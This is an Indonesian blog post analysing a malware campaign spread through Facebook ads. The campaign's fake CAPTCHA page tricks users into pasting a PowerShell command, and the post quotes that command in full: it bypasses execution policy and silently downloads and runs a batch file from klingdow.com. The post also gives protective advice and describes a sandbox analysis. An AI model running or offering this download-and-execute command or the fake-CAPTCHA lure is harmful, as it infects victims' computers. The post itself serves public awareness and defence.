Malware di facebook Ads: Penyebaran Malware dengan Metode Captcha Palsu dan PowerShell

Kukuh T Wicaksono
6 min readNov 3, 2024

--

Saat menjelajah timeline Facebook, saya menemui berbagai iklan yang tampak menarik dan mengarahkan saya ke situs eksternal. Namun, baru-baru ini saya menemukan hal yang mencurigakan. Iklan di Facebook Ads membawa saya ke sebuah situs yang ternyata berbahaya dan mengandung malware. Situs tersebut mencoba menyusupkan file berbahaya ke perangkat pengguna dengan menyamar sebagai verifikasi CAPTCHA. Setelah melakukan investigasi lebih lanjut, saya menemukan bahwa situs ini terhubung dengan malware dari klingdow.com/1.bat, yang dapat membahayakan sistem Windows. Berikut adalah penjelasan detail tentang bagaimana malware ini bekerja dan bagaimana Anda dapat melindungi diri dari ancaman serupa.

Salah satu taktik yang digunakan oleh penjahat siber untuk menyebarkan malware adalah dengan menyamar sebagai CAPTCHA palsu. Dalam kasus yang melibatkan klingdow . com, pengguna ditipu untuk percaya bahwa mereka harus membuktikan bahwa mereka bukan robot dengan mengikuti perintah. Mereka diarahkan untuk menjalankan perintah PowerShell yang tampaknya tidak berbahaya, tetapi sebenarnya menyusupkan malware ke komputer mereka.

Berikut adalah penjelasan bagaimana cara penyebaran ini bekerja dan bagaimana pengguna bisa tertipu:

Cara Kerja Penyebaran:

1. CAPTCHA Palsu:
— Pengguna dihadapkan dengan halaman web atau pop-up yang meminta mereka untuk membuktikan bahwa mereka bukan robot. Biasanya, CAPTCHA yang asli meminta pengguna untuk menyelesaikan tantangan sederhana (misalnya, memilih gambar tertentu).
— Namun, CAPTCHA palsu ini tidak melakukan verifikasi apapun. Sebaliknya, pengguna diminta untuk menyalin dan menempel perintah PowerShell ke terminal Windows mereka.

2. Instruksi untuk Menjalankan PowerShell:
— Perintah yang diberikan terlihat seperti ini:
powershell

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command “& {Invoke-WebRequest -Uri ‘klingdow.com/1.bat’ -OutFile $env:TEMP\file.bat; Start-Process $env:TEMP\file.bat -WindowStyle Hidden} Authentication Is Not a Robot Press Enter to confirm

— Pengguna diberitahu untuk menyalin dan menjalankan perintah ini sebagai cara untuk “memverifikasi” identitas mereka.
— Apa yang sebenarnya dilakukan perintah ini:

— ExecutionPolicy Bypass: Mengizinkan PowerShell untuk menjalankan skrip tanpa batasan keamanan yang biasanya diterapkan.

— Invoke-WebRequest: Mengunduh file berbahaya 1.bat dari klingdow . com dan menyimpannya di folder sementara sistem (misalnya, `$env:TEMP`).

— Start-Process: Memulai eksekusi file batch yang diunduh tanpa menampilkan jendela apa pun (menjalankan secara tersembunyi).

Dalam perintah tersebut, pengguna percaya bahwa mereka hanya mengonfirmasi bahwa mereka bukan robot, padahal mereka tanpa sadar telah menjalankan skrip yang berbahaya.

3. Eksekusi Malware:
— Setelah skrip PowerShell dijalankan, file batch yang diunduh (1.bat) langsung dieksekusi. File batch ini dapat berisi berbagai macam perintah berbahaya, seperti:

— Menginstal malware ke dalam sistem pengguna.
— Mencuri data sensitif.
— Menjalankan keylogger untuk merekam aktivitas keyboard pengguna.
— Memberikan akses jarak jauh kepada peretas untuk mengendalikan komputer korban.
— Menyebarkan lebih lanjut ke jaringan yang terhubung dengan komputer korban.

4. Metode Tersembunyi:
— WindowStyle Hidden memastikan bahwa semua proses ini berjalan tanpa tampilan apa pun di layar pengguna. Ini berarti korban tidak menyadari bahwa malware telah berjalan di latar belakang.

Mengapa Pengguna Tertipu?

- Ketidaktahuan Teknis: Banyak pengguna tidak memiliki pengetahuan teknis yang cukup untuk memahami apa yang mereka jalankan. Mereka hanya mengikuti instruksi yang diberikan oleh halaman web yang terlihat sah.
- Tekanan Sosial: Halaman web seringkali memberi kesan bahwa jika pengguna tidak mengikuti langkah-langkah ini, mereka tidak akan bisa melanjutkan aktivitas mereka (misalnya, mengakses konten atau layanan).
- Tampilan yang Meyakinkan: CAPTCHA palsu ini didesain sedemikian rupa agar terlihat seperti CAPTCHA asli, membuat pengguna merasa aman dan mengikuti instruksi tanpa berpikir panjang.

Langkah Perlindungan dari Penyebaran Malware Seperti Ini

1. Jangan Menjalankan Perintah Tidak Dikenal:
— Jangan pernah menyalin dan menjalankan perintah yang Anda tidak pahami, terutama jika diminta untuk menjalankan sesuatu di terminal (seperti PowerShell atau Command Prompt).

2. Periksa Kebenaran CAPTCHA:
— Jika Anda menemukan CAPTCHA yang meminta Anda untuk menyalin dan menjalankan kode, ini adalah tanda peringatan. CAPTCHA asli tidak akan pernah meminta Anda untuk menjalankan perintah manual di sistem operasi Anda.

3. Perbarui dan Gunakan Antivirus:
— Pastikan sistem Anda memiliki perangkat lunak antivirus yang terupdate yang dapat mendeteksi dan memblokir perintah berbahaya seperti ini.

4. Gunakan Firewall:
— Aktifkan firewall Anda untuk memblokir akses ke situs berbahaya seperti klingdow . com. Ini dapat membantu menghentikan malware sebelum diunduh ke komputer Anda.

5. Perbarui Sistem Operasi:
— Pastikan Windows dan perangkat lunak lain di komputer Anda selalu diperbarui untuk mengurangi risiko eksploitasi dari celah keamanan.

6. Gunakan Ekstensi Keamanan pada Browser:
— Anda bisa menggunakan ekstensi browser yang memblokir situs berbahaya atau phishing untuk memfilter halaman yang mencoba menyebarkan malware dengan cara seperti ini.

Serangan malware yang disamarkan sebagai CAPTCHA palsu dan menggunakan PowerShell adalah metode licik yang bisa membuat pengguna tanpa sadar mengeksekusi perintah berbahaya. Dengan menipu pengguna untuk menjalankan skrip PowerShell, malware ini dapat menyusup ke sistem, menyebabkan kerusakan yang besar. Selalu waspada dan jangan pernah menjalankan perintah yang Anda tidak pahami, terutama jika diminta melalui halaman web yang mencurigakan.

Tetap aman dengan memverifikasi sumber perintah dan gunakan langkah-langkah keamanan seperti antivirus dan firewall untuk melindungi perangkat Anda.

Gambar menunjukkan hasil analisis terhadap file batch berbahaya (`1.bat`) menggunakan platform seperti ANY.RUN, yang digunakan untuk menganalisis malware secara dinamis. Berikut adalah penjelasan detailnya:

1. Lokasi File dan Eksekusi:
— Di gambar, terlihat file `1.bat` yang berada di folder Download pada sistem operasi Windows 10. Menu klik kanan menunjukkan opsi untuk mengedit file tersebut menggunakan Notepad++ atau menjalankannya sebagai administrator.
— File batch `1.bat` (berukuran 170 KB) sedang dianalisis karena dicurigai mengandung perintah yang berbahaya.

2. Aktivitas Berbahaya Terdeteksi:
— Pada bagian atas, ada peringatan ”Malicious activity” yang berarti bahwa file tersebut dianggap memiliki perilaku berbahaya saat dieksekusi.
— URL https: // klingdow . com / 1.bat adalah tempat file tersebut diunduh. File batch ini dibuka menggunakan browser, yang mungkin menjadi cara file tersebut mulai mengeksekusi perintah berbahaya.

3. Tinjauan Proses:
— Panel sebelah kanan menunjukkan daftar proses yang berjalan selama file batch tersebut dieksekusi.
— Proses `chrome.exe` muncul beberapa kali dengan berbagai

Process ID (PID) (seperti 1792, 3648, 3580, dan seterusnya). Ini menunjukkan bahwa Google Chrome digunakan untuk berbagai aktivitas selama analisis, seperti mengunduh file, rendering, atau interaksi dengan file batch.
— Parameter baris perintah untuk setiap proses `chrome.exe` menunjukkan bahwa Chrome diatur untuk meminimalkan aktivitas tertentu, seperti menonaktifkan cache dan fitur GPU (` — disk-cache-dir=null`, ` — disable-features=…`). Ini menunjukkan bahwa lingkungan analisis ini dikontrol untuk memantau perilaku malware.

4. Aktivitas Jaringan dan Sistem:
— Panel bagian bawah menunjukkan aktivitas jaringan, di mana terdapat beberapa permintaan HTTP dengan status `200: OK`, yang menandakan bahwa permintaan ke berbagai URL (seperti Microsoft Certificate Revocation List (CRL)) berhasil.
— Koneksi dan Permintaan DNS: Ada 46 koneksi dan 28 permintaan DNS yang tercatat, menunjukkan bahwa malware mungkin berusaha berkomunikasi dengan server eksternal atau melakukan resolusi nama domain sebagai bagian dari operasinya.

5. Eksekusi Manual:
— Di bagian bawah, tertulis bahwa Notepad++ dijalankan secara manual oleh pengguna. Ini kemungkinan berarti bahwa pengguna membuka file batch dalam Notepad++ untuk memeriksa isinya, yang sering dilakukan dalam analisis malware untuk melihat script sebelum mengeksekusinya.

File batch (`1.bat`) dari `https : // klingdow . com` telah dianalisis dan dideteksi memiliki aktivitas berbahaya. File ini tampaknya melakukan tindakan berbahaya saat dijalankan, kemungkinan menggunakan
Chrome untuk menjalankan sebagian dari operasinya. Lingkungan analisis berhasil mencatat perilakunya, termasuk pembuatan proses, komunikasi jaringan, dan perubahan sistem.

Sebaiknya hindari mengeksekusi file semacam ini di luar lingkungan analisis yang aman dan pastikan sistem Anda dilindungi dengan langkah-langkah keamanan yang tepat.

--

--

No responses yet